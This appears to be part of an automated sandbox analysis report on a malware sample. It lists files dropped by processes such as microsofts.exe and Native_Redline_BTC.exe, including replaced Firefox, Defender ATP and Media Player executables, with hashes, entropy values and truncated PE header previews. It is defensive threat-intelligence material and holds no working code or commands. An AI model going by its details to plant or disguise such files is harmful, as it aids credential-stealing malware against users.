                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.....................................0.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\firefox.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1246208
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.49425964918078
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:ft9o6p4xQbiKI69wpemIwpel9BsqjnhMgeiCl7G0nehbGZpbD:ft9faQbtl2peapel7Dmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:121E866E192FA8130D6F5CE277DA933D
                                                                                                                                                                                                                                                                                                          SHA1:78B23BBA5A4AC772D4FB5A952E67509001F21909
                                                                                                                                                                                                                                                                                                          SHA-256:11BBE111EDA8B3264A82AC1BF55B78A807254C9C5AB5D2C4F6D07AAB7F95D12E
                                                                                                                                                                                                                                                                                                          SHA-512:C4997C9435B2E5117DD1EEEB87261802AF31F5AA44453D5FF9D1ABC2BEAB913DA57442BCA2CE5518400B9B52E43506A7D3A97C797F9AFA3603B4E6200672866E
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@.......................................... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\maintenanceservice.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1356800
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.347820611221574
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:pQVTZu0JqsqjnhMgeiCl7G0nehbGZpbD:qVTZuLDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:47B60E7BD7B55BB5EEBD1FDD2FDB0137
                                                                                                                                                                                                                                                                                                          SHA1:8AC77A07BF7CF222E669C73D7244463C7DA7DE1C
                                                                                                                                                                                                                                                                                                          SHA-256:2B53ED86B57739A082479D09F086E662FF324B3C352A6D66E3075EBE10DB303A
                                                                                                                                                                                                                                                                                                          SHA-512:0AFFEA3A05BEED1BBF44F3BC0EB232A2943EB275AA57162CD87389C91064E0EA1CFEEF0E8E2C91AEEBAD5EDC00EE09508423193010F0F62EC508D3BA8E151B5D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P......Vf.... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1344000
                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.808344186514582
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:VC1vpgXcZHzgsqjnhMgeiCl7G0nehbGZpbD:VC1vpIcNcDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:3D59DD5A4AF701ACBF6263A78CA7EC58
                                                                                                                                                                                                                                                                                                          SHA1:B20F0B1D3D43C31C831581F15D150FE810EB161D
                                                                                                                                                                                                                                                                                                          SHA-256:1EFE55F0E53CA032418BB14928F873A3ED2E628588C5216AF66BCED4FFAB2CFF
                                                                                                                                                                                                                                                                                                          SHA-512:410B63C1D5C9F37F203F1FA6CBABC2A5B466C5A1F683B897CBF29E7182AD463263DE0E9D29D8180DF9E236869810B3895F5D044200FFAD846275D69F50C3B8B8
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\pingsender.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1200128
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.140013496830126
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:fSwj0Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:fv0sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:8AA238F9B513CB84033CAE4BDC40C217
                                                                                                                                                                                                                                                                                                          SHA1:1178A5198AD311FCC4B554E598C24842B94D26FE
                                                                                                                                                                                                                                                                                                          SHA-256:314A209DFF3B26A215948FE91009EA28DE5E6AD7325261C7F8D1416B71EBD617
                                                                                                                                                                                                                                                                                                          SHA-512:4287DC5F806CCCC06AA33EAAB0E1C65122FC5B67AF9DBAB28C2A9A80843B1921B196281CA725ADDC56609E9C2A125D88FE707C4B80448AE43CA23AA61395F581
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.....................................k.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\plugin-container.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1408512
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.44114110006722
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:NWKntIfGpasqjnhMgeiCl7G0nehbGZpbD:U8IeEDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:1464418DE04E55FCBC361E207BC34BB2
                                                                                                                                                                                                                                                                                                          SHA1:B7BD79FEB2B69557E9DCED2B0FD20575B52E550D
                                                                                                                                                                                                                                                                                                          SHA-256:3479072A81AE3F1BA8C0C6DF8FABDA8282C93C57E17D1889E33D4A41AAB9E3A3
                                                                                                                                                                                                                                                                                                          SHA-512:C36E3612BAA8BF6857F0756819130A2B2539217B58C6D42A4762A5028FC047379BC14CD27D4FEA06FC6602C59F66AFD811CBD98B9E3E2D99AFC9190E41D2164A
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@.....................................;.... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\private_browsing.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1185280
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.103270624064531
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:XIh4Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:W4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:C495F6692A3F767ED5E9177669181D38
                                                                                                                                                                                                                                                                                                          SHA1:B9B49C4BB5A326DFA5D43AC79F7D2BB348413B88
                                                                                                                                                                                                                                                                                                          SHA-256:77F1E49AEB6692DB0701F733385BD2C194C722D9AC94D93E35F5199ABB09E589
                                                                                                                                                                                                                                                                                                          SHA-512:0C26D62F96B000CF110CD042B9505AC824D43BF62E4E238F1077F83E9815D2952C137415B1C4BDA65FA53F18A7BE6D99A15802F7FC54C2DCE0C6FC232490B80B
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................:..... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Mozilla Firefox\updater.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1531904
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4211850794296135
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:68oREwt2ioQ3J+RxsqjnhMgeiCl7G0nehbGZpbD:68oRpoFFDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:D0C13D404CF323172B182289F096B688
                                                                                                                                                                                                                                                                                                          SHA1:4672333A732061DE6F96EB14AAE79889F66DA430
                                                                                                                                                                                                                                                                                                          SHA-256:6539DD5F05CD716E77D447E3CE469DBECA28D75FC94401C7EA69AE6A49D05D62
                                                                                                                                                                                                                                                                                                          SHA-512:FC60A732F0B7E15A5452C4C4154BB30EC8F384FCB885C3A7AB8A284C2D50A910426D286AC6E3AB300318CEE1F162FD92A6C324C0F7F32751C48EE24E2220263C
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.......................................... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1341952
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.238585236153977
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:3f8HQlDMxHwJ07wxsqjnhMgeiCl7G0nehbGZpbD:3kHQlqwJ0eDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:B30C2ECC152BBA1D3D0A6873805A61F3
                                                                                                                                                                                                                                                                                                          SHA1:AC8C81F37FFF74B32F606F2E020C192010682C0A
                                                                                                                                                                                                                                                                                                          SHA-256:6588FC88B7543D680082EDE3C8CD2E2DBCF80E7CFA2E707F03F6B2DEBD229808
                                                                                                                                                                                                                                                                                                          SHA-512:E79D5C5C9EE610F9714421890AA2315FA33D2C3361816EF34EBFF35515BFC003D3315AF6A2CA112390E0E8841F357F432ADC4DB22C09A1D7C77EBA2FACC6C87D
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.....................................=.... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Program Files\Windows Media Player\wmpnetwk.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1534464
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.124585192268956
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:YSEmYD6gjGPG45QVDkfXplyTyKsqjnhMgeiCl7G0nehbGZpbD:Y5mYD6g2GWQVQf3yThDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:D8565DE5DBB9D887813F778309181D9F
                                                                                                                                                                                                                                                                                                          SHA1:712DC38D3055D03FB37F44A71FBE25E51500FEDC
                                                                                                                                                                                                                                                                                                          SHA-256:E1AD08ED7372CE018B2B1A05A98B0D0D9438F2431E96581F02B277C306E29B4B
                                                                                                                                                                                                                                                                                                          SHA-512:9F33235C8BBE30FBA4DC0A1F611D4B86A2C7D1DA099096FDF567C0BCFB7A163CB49924E22C7676B9C802BB5718315ABB610C94543894457764456CBDCCA631D3
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@....................................1..... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Native_Redline_BTC.exe.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):425
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.357964438493834
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
                                                                                                                                                                                                                                                                                                          MD5:D8F8A79B5C09FCB6F44E8CFFF11BF7CA
                                                                                                                                                                                                                                                                                                          SHA1:669AFE705130C81BFEFECD7CC216E6E10E72CB81
                                                                                                                                                                                                                                                                                                          SHA-256:91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
                                                                                                                                                                                                                                                                                                          SHA-512:C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):410
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                          MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                          SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                          SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                          SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\build.exe.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):3094
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.33145931749415
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
                                                                                                                                                                                                                                                                                                          MD5:3FD5C0634443FB2EF2796B9636159CB6
                                                                                                                                                                                                                                                                                                          SHA1:366DDE94AEFCFFFAB8E03AD8B448E05D7489EB48
                                                                                                                                                                                                                                                                                                          SHA-256:58307E94C67E2348F5A838DE4FF668983B38B7E9A3B1D61535D3A392814A57D6
                                                                                                                                                                                                                                                                                                          SHA-512:8535E7C0777C6B0876936D84BDE2BDC59963CF0954D4E50D65808E6E806E8B131DF5DB8FA0E030FAE2702143A7C3A70698A2B9A80519C9E2FFC286A71F0B797C
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):410
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.361827289088002
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                                                                                                                                                                                                          MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                                                                                                                                                                                                          SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                                                                                                                                                                                                          SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                                                                                                                                                                                                          SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.379633281639906
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:48:BWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMuge//8M0Uyus:BLHxvCZfIfSKRHmOugw1s
                                                                                                                                                                                                                                                                                                          MD5:12C066E6FF46F2CB75966215B8D9A4D0
                                                                                                                                                                                                                                                                                                          SHA1:4F72EABC5DF6AEFD70B3BF4148FE908267DA4586
                                                                                                                                                                                                                                                                                                          SHA-256:14BF2E10EBA187A8C3B808326C926817C6AF60CA241610B26498690629629DC0
                                                                                                                                                                                                                                                                                                          SHA-512:9F64929893B04178A6D3F2BA74B7A55B91165BAD24375A80D12FCB39F6AC92304C8CA2DD37CFEDB27D92021C9E2177D2B21D8BBD30C9337F85049BB00E145467
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                          Size (bytes):587776
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.947618401040904
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:vWLLk3UrmqZ4xcVhDoba7m3GTmPe5rmLZNf/lszBaVyYQHm6Fn:v+nrt6xcd7egm2lm7KW4
                                                                                                                                                                                                                                                                                                          MD5:8C8785AC6585CF5C794B74330B3DB88F
                                                                                                                                                                                                                                                                                                          SHA1:ED055892B3C942F8C3C4B4F36D6CA8ED58A037A1
                                                                                                                                                                                                                                                                                                          SHA-256:16212629068CD8F1506D1C90CE6218DABDAC1B5F62B8414DF72F778B0813A8AE
                                                                                                                                                                                                                                                                                                          SHA-512:223836EBC9968CE6CBACBA1CC772399A55F93F8171A9C7E7A75D7DAEEA540D3273AEC5D1DEA664274D1653AFD1F792FF6C22AB41881411C75B7FA46888763DD4
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Yara Hits:
